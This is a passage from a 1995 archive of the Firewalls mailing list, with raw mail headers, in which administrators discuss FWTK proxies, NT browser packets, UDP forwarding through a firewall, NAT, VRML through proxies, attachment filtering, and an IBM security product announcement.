Any other idea? I have had more serious problems than the address/hostname translation. The fix for Lynx/Mosaic to run properly was just to define properly the _proxy environment variables(where service is one of: http, gohper, ftp, wais). That fixed the hostname translation problem. I am not sure if this is the exact problem you have, though. I am more interested in interfacing http_gw with some form of user auth. in the same style as the other fwtk proxies, like tn_gw. I believe to have asked this question on the fwtk list, but I received no answers, not even my own message back. weird. Cheers, ===========================================+=========================== ****** * *** * * * * *** * * * * * * * * * *** *** * Gustavo Vegas Gustavo.VegasMicrochip.COM ********** CAD Systems Administrator Microchip Technology Inc. ******* Chandler, Arizona ===========================================+=========================== From firewalls-owner Fri Oct 6 13:00:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10225 for firewalls-outgoing; Fri, 6 Oct 1995 12:44:44 -0700 Received: from netmail2.microsoft.com (netmail2.microsoft.com [131.107.1.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA10210 for ; Fri, 6 Oct 1995 12:44:40 -0700 Received: by netmail2.microsoft.com (5.65/25-eef) id AA23205; Fri, 6 Oct 95 13:46:55 -0700 Received: by netmail2 using fxenixd 1.0 Fri, 06 Oct 95 13:46:54 PDT X-Received: from chopper by xmtp2 with recvsmtp; Fri, 6 Oct 1995 12:12:51 -0700 Received: by CHOPPER with Microsoft Exchange id <01BA93E5.0DC1D2B0@CHOPPER>; Fri, 6 Oct 1995 12:12:49 -0700 Message-Id: From: "Greg King (Exchange)" To: "Firewalls@GreatCircle.COM" Subject: NT browsing in a domain Date: Fri, 6 Oct 1995 12:12:45 -0700 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-Msxmtid: xmtp2951006191251RECVSMTP[01.51.00]000000ce-2103 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, Since there seems to be some confusion about what is happening in an NT = environment for browsing or server announcements I thought that I would = specify what is happening exactly. A computer with a server component will initiate a browser announcement = to its local browse master indicating it has the capabilities of = receiving client connection requests. This announcement is a frame of = 243 bytes, and is an Ethernet broadcast at the MAC level, and a subnet = broadcast at the IP level. Browser communications are accomplished using = UDP Port 138 (NetBIOS Datagram Service), and is a standard UDP length of = eight bytes. The next 82 bytes are the NBT section of the frame. This contains the = local source name, and the destination name of the announcement. The = Destination name workgroup <1D> is an announcement to the local browse = master for local clients to query and request browse lists from. The next 86 bytes are the SMB (Server Message Block) header. This = designates the entire SMB command structure used in this announcement. = The thing to note is that the SMB transact file is \MAILSLOT\BROWSE. The = final 33 bytes represent the browser portion of the frame. It contains = the browser command, Host Announcement, the announcement interval = (progresses to 12 minutes), the announced name, and the server type, = such as Windows NT Workstation and Windows NT Server. There may be = multiple Host Announcement frames broadcast, each specifying the host as = a workstation, a server, and as a potential browser. Thanks, Greg King Microsoft Corp. BackOffice Capacity Planning Manager From firewalls-owner Fri Oct 6 13:00:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10420 for firewalls-outgoing; Fri, 6 Oct 1995 12:55:20 -0700 Received: from bigdipper.iagi.net (bigdipper.iagi.net [204.157.123.29]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA10413 for ; Fri, 6 Oct 1995 12:55:17 -0700 Received: (from daveyb@localhost) by bigdipper.iagi.net (8.6.12/8.6.9) id PAA04327; Fri, 6 Oct 1995 15:57:24 -0400 Date: Fri, 6 Oct 1995 15:57:24 -0400 (EDT) From: "David A. Baldwin" To: firewalls@greatcircle.com cc: "David A. Baldwin" Subject: Re: An interesting dilema that I could use help with In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, We have a few Xylogics Annex 3 terminal servers at We would like to place a firewall between the Terminal server and the boot/security server. The firewall package that we use is Raptor's firewall product. While I was trying to implement this I ran into a few problems. The way that we have to use the firewall for this is a bit strange due to the fact that ERPC is a UDP based protocol. We can not use a proxy (which could be bi-directional) because their generic proxyd does not allow UDP to pass through. The way that we implement this is to use what is known as a generic service passer. We set up port 121 on the firewall to pass directly to port 121 on the security/boot server. Thus the terminal server is set up to boot from port 121 on the firewall. The problem with this is that this solution is not bi-directional. There is now no way to use this utility (called na) that resides on the boot/security server to talk to the annex terminal server at port 121. To do this, I would need to set up a rule on the firewall such that all traffic destined to port 121 would go to the terminal server at port 121. That is not possible because this thing does not allow for bi-directional traffic. The way that the na utility works is that it talks to the erpcd on the boot/security server, then the erpcd sends the UDP packet to the terminal server and gets a response or sets a setting to NVRAM. One way to fix this problem might be to get the source of erpcd and make it send info to different ports (i.e. send all info that the na util is sending to port 122 on the firewall and have it redirected to port 121 on the terminal server). I was however hoping that there was an easier solution. I do not mind changing the code myself, but I may not be here forever and if someone were to get a new version of erpcd later and replace my version it might take them a while to figure out what is going on. ------- | ------- | ------- | | |---| | |---| | | | | | | | | | | |---| | |---| | | | | | | | | | | ------- | ------- | ------- Annex | Firewall | Boot Server This is sort of a network diagram of what I have been talking about. Thank you for any help, David Baldwin daveyb@iagi.net From firewalls-owner Fri Oct 6 14:01:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11315 for firewalls-outgoing; Fri, 6 Oct 1995 13:31:18 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA11302 for ; Fri, 6 Oct 1995 13:31:14 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7/res.host.cf-4.0) with ESMTP id QAA08807; Fri, 6 Oct 1995 16:28:41 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7/res.client.cf-4.0) id QAA12950; Fri, 6 Oct 1995 16:28:36 -0400 (EDT) Date: Fri, 6 Oct 1995 16:28:36 -0400 (EDT) Message-Id: <199510062028.QAA12950@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, paul@vix.com Subject: Re: Network Address Translation stuff Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul A Vixie wrote: >> OK I get it, IBM NAT box has application level proxies inside instead of >> pakcet-per-packet address translation. (BTW, Do you know where I can >> find info about this IBM box. Quick search on IBM Web site didn't get me >> anything) > >IBM, like DEC and other large companies, makes it just about impossible to >buy anything from them unless it's something carried by your local computer >store. I've never understood how American industry has lasted so long. I >honestly have no idea how you'd go about learning more details about this; >perhaps ANS is still reselling them and their web page knows about it? Try : http://www.issc1.ibm.com/rsdirect/us/promotions/netsp_promo.htm for the technical details: http://www.issc1.ibm.com/rsdirect/us/promotions/techinfo.htm ----------------- H. Morrow Long, Mgr of Dev., Yale Univ., Comp Sci Dept, 011 AKW, New Haven, CT 06520-8285, VOICE: (203)-432-{1248,1254} FAX: (203)-432-0593 INET: Long-Morrow@CS.Yale.EDU UUCP: yale!Long-Morrow BITNET: Long-Morrow@YaleCS WWW: http://www.cs.yale.edu/HTML/YALE/CS/HyPlans/long-morrow.html From firewalls-owner Fri Oct 6 14:02:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11869 for firewalls-outgoing; Fri, 6 Oct 1995 13:47:14 -0700 Received: from Rt66.com (mack.rt66.com [198.59.162.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA11862 for ; Fri, 6 Oct 1995 13:47:10 -0700 Received: by Rt66.com (4.1/SMI-4.1) id AA28221; Fri, 6 Oct 95 14:42:10 MDT From: dlewis@Rt66.com (David Lewis) Message-Id: <9510062042.AA28221@Rt66.com> Subject: Re: VRML through a Proxy To: firewalls@greatcircle.com Date: Fri, 6 Oct 1995 14:42:09 -0600 (MDT) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 598 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anybody successfully used VRML ( Virtual Reality Markup Language ) > through an Application based Proxy firewall? > If so, what was the client VRML viewer, and what was the firewall > product? I actually just tried it using FWTK's http-gw on the firewall, and the WorldView demo off of the CDROM from Mark Pesce's new book. It worked right off the bat with no changes to the firewall. Of course, we're already setup for web browsing. If you can web browse, I believe you ought to be able to use VRML browsers with no changes to your firewall. dl -- David Lewis dlewis@rt66.com From firewalls-owner Fri Oct 6 14:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13223 for firewalls-outgoing; Fri, 6 Oct 1995 14:27:15 -0700 Received: from charon.ppco.com (ppco.com [138.32.15.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA13216 for ; Fri, 6 Oct 1995 14:27:10 -0700 From: bcsolom@bvemx.ppco.com Received: from bvemx.ppco.com by charon.ppco.com with SMTP id AA12002 (InterLock SMTP Gateway 3.0 for ); Fri, 6 Oct 1995 16:25:40 -0500 X400-Originator: bcsolom@bvemx.ppco.com X400-Recipients: firewalls@GreatCircle.COM X400-Mts-Identifier: [/ADMD=ATTMAIL/C=US/;0011200001408865000004] X400-Content-Type: P2-1988 (22) Priority: Urgent Message-Id: <0011200001408865000004*@MHS> To: "firewalls(a)GreatCircle.COM" Subject: VRML Through a Proxy Firewall Date: Fri, 6 Oct 1995 16:22:09 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anybody successfully used VRML ( Virtual Reality Markup Language ) through an Application based Proxy firewall? If so, what was the client VRML viewer, and what was the firewall product? From firewalls-owner Fri Oct 6 14:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13062 for firewalls-outgoing; Fri, 6 Oct 1995 14:19:57 -0700 Received: from dns.state.mi.us (dns.state.mi.us [204.25.6.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA13055 for ; Fri, 6 Oct 1995 14:19:52 -0700 Received: from STATE.MI.US (ngwsmtp.state.mi.us [167.240.253.6]) by dns.state.mi.us (8.6.12/8.6.12) with SMTP id RAA11749 for ; Fri, 6 Oct 1995 17:13:01 -0400 Received: from MI-Message_Server by STATE.MI.US with Novell_GroupWise; Fri, 06 Oct 1995 17:09:32 -0400 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Fri, 06 Oct 1995 17:19:23 -0400 From: Mark Jaeger To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #579 -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Until I return from vacation on October 16, Linda Baker will receive a forwarded copy of all my correspondence. From firewalls-owner Fri Oct 6 15:01:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA12561 for firewalls-outgoing; Fri, 6 Oct 1995 14:08:01 -0700 Received: from wh.bayer.com (wh.bayer.com [192.80.67.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA12547 for ; Fri, 6 Oct 1995 14:07:53 -0700 From: tws@wh.bayer.com Received: from mrcs1 ([140.250.41.24]) by wh.bayer.com (8.6.12/8.6.12) with SMTP id RAA12161; Fri, 6 Oct 1995 17:02:48 -0400 Received: by mrcs1 (5.64/X1.00) id AA27676; Fri, 6 Oct 95 17:00:13 -0400 Date: Fri, 6 Oct 95 17:00:13 -0400 Message-Id: <9510062100.AA27676@mrcs1> To: alan@mid.net, firewalls-digest@GreatCircle.COM, jcroall@thor.tjhsst.edu Subject: Re: WWW & Proxy Servers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From firewalls-owner@GreatCircle.COM Thu Oct 5 00:56:56 1995 > To: alan@mid.net, firewalls-digest@GreatCircle.COM > Subject: Re: WWW & Proxy Servers > From: "James Croall" . . > The whole system is relatively easy; In fact I > implemented it as a little toy a little while > ago, adding HTTP Proxy support, S/Key authenti- > cation, and SSL (based on the SSLeay package) > all on top of NCSA 1.4. As far as I played with > it, it seemed to work. > > If anybody wants to play with it, I can dig up > code. > --- > jcroall@tjhsst.edu * jcroall@foo.org > http://www.tjhsst.edu/people/jcroall/ Rather than have you dig it up and give it to somebody, does it not make sense to have you give the code to ncsa and have them incorporate it into the next release? According to what you describe, that doesn't sound hard. Regards, Tenna Sakai (tws@wh.bayer.com) Bayer Inc. From firewalls-owner Fri Oct 6 17:01:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17189 for firewalls-outgoing; Fri, 6 Oct 1995 16:46:37 -0700 Received: from port.island.net (port.island.net [199.60.231.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA17182 for ; Fri, 6 Oct 1995 16:46:33 -0700 Received: from hakatac.port.island.net by port.island.net with smtp (Smail3.1.29.1 #2) id m0t1MK9-000IMBC; Fri, 6 Oct 95 16:37 PDT Received: by hakatac.port.island.net (4.1/SMI-4.1) id AA21638; Fri, 6 Oct 95 16:34:51 PDT To: firewalls@greatcircle.com Subject: Firewalls From: soccer@hakatac.almanac.bc.ca (mi) Message-Id: <4ZPkcD9w165w@hakatac.almanac.bc.ca> Date: Fri, 06 Oct 95 16:34:26 PDT Organization: Sir HackAlot's UNIX BBS, Port Alberni, B.C. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Would you please ad me to your mailing list? L8r, Sonic From firewalls-owner Fri Oct 6 17:11:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17111 for firewalls-outgoing; Fri, 6 Oct 1995 16:40:04 -0700 Received: from charon.ppco.com (ppco.com [138.32.15.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA12783 for ; Fri, 6 Oct 1995 14:13:01 -0700 From: asunden@bvemx.ppco.com Received: from bvemx.ppco.com by charon.ppco.com with SMTP id AA11489 (InterLock SMTP Gateway 3.0 for ); Fri, 6 Oct 1995 16:11:21 -0500 X400-Originator: asunden@bvemx.ppco.com X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/ADMD=ATTMAIL/C=US/;0011200001408839000004] X400-Content-Type: P2-1988 (22) Message-Id: <0011200001408839000004*@MHS> To: "firewalls(a)greatcircle.com" Subject: NOTE 10/06/95 16:11:00 Date: Fri, 6 Oct 1995 16:07:52 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To: OAS --BVEMX1 EMXOAS Has anyone been able to get VRML (virtual reality markup language) to work properly through an application proxy firewall? From firewalls-owner Fri Oct 6 17:12:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17061 for firewalls-outgoing; Fri, 6 Oct 1995 16:39:02 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA28759 for ; Fri, 6 Oct 1995 06:27:19 -0700 Message-Id: <199510061327.GAA28759@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA035495947; Fri, 6 Oct 1995 23:25:47 +1000 From: Darren Reed Subject: Security announcement from IBM. To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Fri, 6 Oct 1995 23:25:46 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 10977 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I believe this announcement is of interest to firewalls... ...there are some very interesting items below, including IBM setting up their own CERT squad. I apologise in advance if it has already been posted here and I just haven't caught up with it. darren > *------------------------------------------------------------------------ > IBM Announces Security Software and Services to Protect the Enterprise > September 28, 1995 > > As part of its long-standing commitment to data security, IBM has > announced enhancements, availability and pricing for a broad range of > I/T security products and services designed to protect the enterprise > from intrusion. > > The announcement includes: > > -- The launch of the Emergency Response Service , which provides expert > incident management skills to clients during and after electronic > security emergencies; > > -- A Customized Infiltration Tool Kit , to detect the most > subtle weaknesses in a customer's Internet connection; > > -- Significant enhancements and price reductions on IBM's > firewall product; > > -- The announcement for secure Web servers and browsers ; > enhancements to IBM AntiVirus software to support Windows 95 **; > > -- The availability of a new release of RACF *, IBM's award- > winning Resource Access Control Facility, which now provides > password synchronization across your RACF managed systems; > > -- The announcement of Internet secure OS/400 *, the operating system > for the world's most popular business computing system. > > > Emergency Response Team Operational Worldwide > > In response to concerns about network infiltrations, IBM > announced that its Emergency Response Service for commercial > businesses is now operational for customers throughout the world. > Chartered to provide swift, expert incident management skills to > clients during and after electronic security emergencies, the > emergency response team specializes in electronic disasters that > affect data processing capabilities, and is available to > customers on a subscription basis via IBM's Integrated Systems > Solutions Corporation (ISSC)*. > > This global service periodically checks customers' networks > and can act as an extension of clients' I/T staffs. In the event > of a network break-in, the team helps customers detect, isolate, > contain and recover from unauthorized network infiltration. They > are on call 24 hours a day, seven days a week around the world. > IBM team members, who have extensive incident management > experience, develop an understanding of customers' networks and > system architectures, as well as how their firewalls are > configured and maintained. > > > Customized Weakness Detection Kit > > IBM's Customized Infiltration Tool Kit, a sophisticated set > of tools to detect security weaknesses in clients' Internet > connections, is available today. With these tools, IBM can probe > the subtlest weaknesses that the most sophisticated hackers might > try to exploit. > > These tools exercise network connections that go beyond the > capabilities of most existing tools on the market and are > customized to match clients' specific network configurations. > > The Customized Infiltration Tool Kit is part of IBM's I/T Security > Consulting offering, and was developed in conjunction with IBM > Research's Global Security Analysis Labs in New York and Zurich. > > Advanced Firewall Security *** > > As part of these security announcements, IBM announces a > new release and a price reduction for its firewall, the Internet > Connection Secured Network Gateway*, to promote its wider > availability and advance the state of security on the Internet. > Formerly known as the NetSP Secured Network Gateway, the Internet > Connection Secure Network Gateway will be available to the public > on October 27. > > The firewall now supports AIX 4.1.3, and operates with the > popular RISC System/6000* workstation. It contains an encrypted > IP tunnel that encodes data from one firewall to another using > DES, the Data Encryption Standard invented by IBM more than 20 > years ago, and Commercial Data Masking Facility (CDMF), an > exportable encryption technology used outside of North America. > The IP tunnel and key distribution is one of the first that is > based on the latest IETF specifications, providing the most > advanced technology for firewalls currently available. > > The Internet Connection Secured Network Gateway also includes remote > administration and an alarm capability that allows a user to set > alerts that are triggered when certain errors or other security > violations occur. > > > Secure Web Servers and Browsers *** > > IBM is also announcing the IBM Internet Connection Secure > Web Servers for the OS/2* and AIX* platforms and IBM's Internet > Connection Secure WebExplorer for OS/2 Warp. Using the industry > standard protocols Secure HyperText Transfer Protocol (S-HTTP) > and Secure Sockets Layer (SSL)**, these secure Web servers and > browser will be commercially available on December 8. IBM > Internet Connection Secure Servers provide several security > methods for conducting commerce over the Internet, including > public key data encryption technology. > > > Anti-Virus Software and Services > > IBM also announced that its IBM AntiVirus software will be > available for the Windows 95 platform in November. IBM AntiVirus > software provides comprehensive virus detection, removal and > protection for over 6,000 known computer viruses, and is widely > available on the OS/2*, DOS**, Windows**, and NetWare** > platforms for $49. > > IBM AntiVirus scans memory, hard disks, floppy drives and > network servers for thousands of viruses, including polymorphic > viruses that change to avoid detection, and viruses previously > considered impossible to discover. To uncover unknown viruses, > the software contains heuristics that attempt to find viruses by > watching for behavior that is characteristic of viruses. IBM's > anti-virus software products are available on the Internet via > IBM's AntiVirus home page at http://www.brs.ibm.com/ibmav.html. > > > RACF 2.2 Debuts > > IBM's acclaimed Resource Access Control Facility (RACF) for > MVS will debut Version 2.2 this week on September 29. RACF is a > versatile, effective security tool that protects MVS system > resources from inadvertent damage and deliberate misuse of data. > New features for RACF 2.2 include password synchronization and > the ability to administer multiple remote RACF databases with a > single command, without logging onto the remote systems. RACF > 2.2 also features a "remove ID" utility that eliminates security > problems created by old, unneeded user ID's, and has expanded its > support for OpenEdition MVS by providing security checking and > auditing for the XPG4 environment. RACF 2.2 also provides > enhancements to its PassTicket support, an alternative to RACF > passwords. With RACF 2.2 you can now use unique PassTicket keys > for different RACF users and groups who need access to the same > secured application. > > These new features build upon support provided in RACF 2.1, > such as RACF's sysplex data sharing support which uses the > System/390 parallel sysplex services to cache RACF data. RACF > also uses these services to transmit selected administrative > commands to peer RACF systems. The administrator can send these > commands from one system to take effect on all systems enabled > for sysplex communication. > > IBM has previously announced its intention to enhance RACF > for VM by providing support for the OpenEdition POSIX and Shared > File System features of VM/ESA. > > > Internet Secure OS/400 > > IBM's AS/400 operating system, OS/400, offers a fully integrated > set of security features that have been evaluated to meet the U.S. > Government C2 security criteria. OS/400 Version 2 Release 3 is > scheduled to receive the C2 rating at the National Security Conference > in October. Subsequent releases of OS/400 have been designed to meet > C2 and IBM intends to continue to participate in the government > evaluation process. Included in the C2 evaluation was the AS/400 > relational database DB2/400, which is integrated into the operating > system, and utilizes the same security mechanisms as OS/400. This > ensures the integrity of information stored in OS/400, as well as the > security of user access to AS/400 computing resources, providing > customers with unmatched security for midrange system computing. > > IBM's AS/400 provides full individual accountability via a > centralized identification and authentication built into the > system. Users are uniquely identified by a one-way DES encrypted > password. > > Since all sharable data is contained in encapsulated > objects, discretionary access control is maintained by each > object manager using a system-wide access algorithm. Access to > objects may be controlled through public, private, or adopted > authorities and may be managed through user groups and common > object authorization lists. > > Additionally, AS/400 provides a highly configurable set of > auditing capabilities selectable to individual users, objects, or > events. > > Hardware and software encryption/decryption capabilities > supporting data confidentiality, non-repudiation, authentication, > and data integrity are also available on AS/400. > > These announcements complement a wide range of I/T > security offerings already available from IBM -- from encryption > hardware and software, access control products, firewalls and > security management and administration, to DCE security services, > IBM Global Network security services and implementation services. > Additional information on these offerings can be found through > the IBM I/T Security home page, at http://www.ibm.com/Security. > > IBM's security products support the security component of > the Open Blueprint. A white paper with information about > security in the Open Blueprint is available for reference on the > Internet at: http://www.torolab.ibm.com/openblue/openblue.html. > > For more information about other IBM products and services, > see the IBM home page on the World Wide Web, located at > http://www.ibm.com. > > * Indicates trademark or registered trademark of International > Business Machines. > > ** Indicates trademark or registered trademark of the > respective companies. > > *** Editor's Note: For more information on IBM's advanced > firewall security and Internet Connection Secure Web Servers and > Browsers, please refer to the accompanying press release. From firewalls-owner Fri Oct 6 20:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA19848 for firewalls-outgoing; Fri, 6 Oct 1995 19:45:19 -0700 Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA19841 for ; Fri, 6 Oct 1995 19:45:15 -0700 Received: by wabash.iac.net id WAA04325; Fri, 6 Oct 1995 22:43:36 -0400 Date: Fri, 6 Oct 1995 22:43:34 -0400 (EDT) From: Carl Jolley To: Chris Tyler cc: Slava Kritov , Firewalls@GreatCircle.COM Subject: Re: Mail Proxy In-Reply-To: <306c46060.cfb@devel.dejong.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Uhh, and what do you suggest for a uuencoded text that's been rot13'ed and is appended to the body of the message, not attached? **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** On Fri, 29 Sep 1995, Chris Tyler wrote: > > Slava Kritov writes: > > > Any uuencode ? > > Sorry, as a sysadm of 500+ orgs can say, that people sometimes exchange > > word docs in uuencode, and ( for Mac's ) you can't even say its word doc > > based on name ... > > Right... so? The purpose was to deny all attachments, whether word DOCs or executables. So > you look for the uuencode signature string and deny. > > Chris Tyler Chris@DeJong.Com CTyler@Oxford.Net > Systems Development Manager, Wm. De Jong Enterprises Inc. > +1-519-424-9007 / fax +1-519-424-2399 > From firewalls-owner Fri Oct 6 23:30:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA22113 for firewalls-outgoing; Fri, 6 Oct 1995 23:06:29 -0700 Received: from furnace.cybergraphic.com.au ([203.5.40.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA22106 for ; Fri, 6 Oct 1995 23:06:24 -0700 Received: from mailgate.cybergraphic.com.au (mailgate.cybergraphic.com.au [203.5.40.130]) by furnace.cybergraphic.com.au (8.6.12/8.6.12) with SMTP id QAA02627; Sat, 7 Oct 1995 16:02:59 +1000 Received: from cc:Mail by mailgate.cybergraphic.com.au id AA813106958; Sat, 07 Oct 95 16:00:24 eet Date: Sat, 07 Oct 95 16:00:24 eet From: "greg hume" Message-Id: <9509078131.AA813106958@mailgate.cybergraphic.com.au> To: firewalls@greatcircle.com, fwtk-users@tis.com Subject: FWTK ftp-gw, http-gw Statically linked problem Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, We are at his moment attempting to find the cause to a problem with FWTK 1.3. The FTP-GW and HTTP-GW are the services we have configured so far. Each time we start the service by connecting to the server/firewall we are getting "Statically Linked" messages. The messages appear in the log files and on telnet sessions when we telnet to the gw service ports. We think it may be an environment problem but cannot pin it down. The authsvr has successfully been compiled with linking forced to be dynamic or static. The gw apps appear work fine in debug mode. Any help/advise would be welcome. I really don't wish to scrog the hd and rebuild from aaaaaAAARGH. Greg Senior Systems/Network Analyst Cybergraphic Systems PTY LTD. 862 Glenferrie Rd. Hawthorn Melbourne, Australia 3122 From firewalls-owner Fri Oct 6 23:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA22136 for firewalls-outgoing; Fri, 6 Oct 1995 23:11:25 -0700 Received: from furnace.cybergraphic.com.au ([203.5.40.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA22129 for ; Fri, 6 Oct 1995 23:11:19 -0700 Received: from mailgate.cybergraphic.com.au (mailgate.cybergraphic.com.au [203.5.40.130]) by furnace.cybergraphic.com.au (8.6.12/8.6.12) with SMTP id QAA02632; Sat, 7 Oct 1995 16:07:59 +1000 Received: from cc:Mail by mailgate.cybergraphic.com.au id AA813107259; Sat, 07 Oct 95 16:04:54 eet Date: Sat, 07 Oct 95 16:04:54 eet From: "greg hume" Message-Id: <9509078131.AA813107259@mailgate.cybergraphic.com.au> To: firewalls@greatcircle.com, fwtk-users@tis.com Subject: RE: FWTK ftp-gw, http-gw Statically linked problem Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 7/10/95 Greg wrote >Hi all, >We are at his moment attempting to find the cause to a problem with >FWTK 1.3. The FTP-GW and HTTP-GW are the services we have configured >so far. Each time we start the service by connecting to the >server/firewall we are getting "Statically Linked" messages. The >messages appear in the log files and on telnet sessions when we telnet >to the gw service ports. We think it may be an environment problem but >cannot pin it down. >The authsvr has successfully been compiled with linking forced to be >dynamic or static. The gw apps appear work fine in debug mode. >Any help/advise would be welcome. I really don't wish to scrog the hd >and rebuild from aaaaaAAARGH. ps. We are running Linux build 1.3.8 Greg Senior Systems/Network Analyst Cybergraphic Systems PTY LTD. 862 Glenferrie Rd. Hawthorn Melbourne, Australia 3122 From firewalls-owner Sat Oct 7 13:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA04649 for firewalls-outgoing; Sat, 7 Oct 1995 13:27:33 -0700 Received: from fmgmt.mgmt.utoronto.ca (fmgmt.mgmt.utoronto.ca [128.100.43.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA04642 for ; Sat, 7 Oct 1995 13:27:30 -0700 Received: by fmgmt.mgmt.utoronto.ca (5.57/Ultrix3.0-C) id AA10735; Sat, 7 Oct 95 16:20:58 -0400 Date: Sat, 7 Oct 95 16:20:58 -0400 Message-Id: <9510072020.AA10735@fmgmt.mgmt.utoronto.ca> X-Sender: hayes@fmgmt.mgmt.utoronto.ca X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Gordon Hayes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Sat Oct 7 14:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA04715 for firewalls-outgoing; Sat, 7 Oct 1995 13:37:51 -0700 Received: from fmgmt.mgmt.utoronto.ca (fmgmt.mgmt.utoronto.ca [128.100.43.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA04706 for ; Sat, 7 Oct 1995 13:37:48 -0700 Received: by fmgmt.mgmt.utoronto.ca (5.57/Ultrix3.0-C) id AA10792; Sat, 7 Oct 95 16:31:18 -0400 Date: Sat, 7 Oct 95 16:31:18 -0400 Message-Id: <9510072031.AA10792@fmgmt.mgmt.utoronto.ca> X-Sender: hayes@fmgmt.mgmt.utoronto.ca X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@greatcircle.com From: Gordon Hayes Subject: Survey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I am a Graduate Student at the University of Toronto, Canada, doing my thesis on DATA COMMUNICATION SECURITY AUDIT. I would greatly appreciate if you could take a minute to assist me in my academic endeavours by reviewing and completing the following questionaire. Respondents will receive a summary if the findings. All information provided will be held in the strictest confidence. Any questions you do not wish to answer, please mark "N/A". Any addtional comments which you might fell would be helpful in this study would be greatly appreciated. Thank you in advance for your assistance in this study. Questions: a) As a firm, are you concerned about the security of your internet connection? b) Are you concerned about the Audibility of your Internet Connection? c) Please rate the importance of the following to your firm: i) timeliness of reporting ii) readibility of audit reports iii) notification of breach iv) traffic pattern analysis v) forensic analysis vi) personal contact vii) seamless integration into your particular environment. d) What tyoe of firewall systems do you use today? e) How long have you been connected to Internet? f) How longhave you used a firewall? g) How big is your oranization? - # employees and sales revenue, remote locations, # people authorized to use Internet? Thank you for taking time in completing the above. I look forward to tabulating the results. From firewalls-owner Sat Oct 7 17:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com 